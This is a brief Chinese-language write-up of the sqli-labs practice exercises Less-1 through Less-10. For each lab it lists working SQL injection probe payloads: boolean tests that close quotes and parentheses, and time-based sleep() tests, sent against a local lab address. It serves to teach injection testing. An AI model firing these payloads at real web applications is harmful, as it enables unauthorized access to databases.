sql注入专辑-4-sqli-lab靶场1-10

实验1

输入： http://192.168.46.128/sqli/Less-1/?id=1

输入一个单引号报错

?id=1’and 1=1–+
有回显

?id=1’and 1=2–+

得出正确的测试语句： ?id=1’and 1=1–+

实验2

?id=1 and 1=1–+

?id=1 and 1=2–+

实验3

单引号报错，双引号没反应
?id=1’)and 1=1–+

实验4

双引号报错
?id=1") and 1=1–+

?id=1") and 1=2–+

实验5
?id=1’ and sleep(2)–+
明显有时间延长

实验6

双引号报错，单引号不报

?id=1" and sleep(4)–+

实验7-与前几个都不同
加上双括号
?id=1’)) and 1=1–+

实验8

测试sleep，可以先测试一个正常的，比较这个迟缓时间
?id=1" and sleep(4)–+（错误）一下就跳了

?id=1’ and sleep(1)–+ 有延迟

实验9

?id=1’ and sleep(5)–+

实验10

?id=1" and sleep(5)–+
有延迟